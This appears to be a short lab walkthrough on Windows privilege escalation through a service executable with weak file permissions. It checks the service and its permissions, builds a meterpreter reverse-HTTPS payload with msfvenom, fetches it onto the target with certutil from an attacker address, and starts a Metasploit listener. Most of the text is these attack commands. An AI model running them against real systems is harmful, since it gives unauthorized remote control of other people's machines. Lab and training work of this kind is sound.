Service Exploits - Insecure Service Executables

In this section we will exploit the insecure services.

Now, Let’s start.

sc qc filepermsvc

Untitled

Now, Let’s check the permissions on this path.

accesschk.exe /accepteula -quvw "C:\\Program Files\\File Permissions Service\\filepermservice.exe"

Untitled

Notice that we have all access on this file.

Now, Let’s start our exploitation phase.

Let’s create a new payload with msfvenom.

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.8.44.22 LPORT=444 -f exe -o administrator.exe

Untitled

Now, Let’s transfer it to the victim machine.

certutil -urlcache -f <http://10.8.44.22/administrator.exe> administrator.exe

Untitled

Now, on the attacker machine let’s open a listener.

set payload windows/x64/meterpreter/reverse_https
set lhost tun0
set lport 444
exploit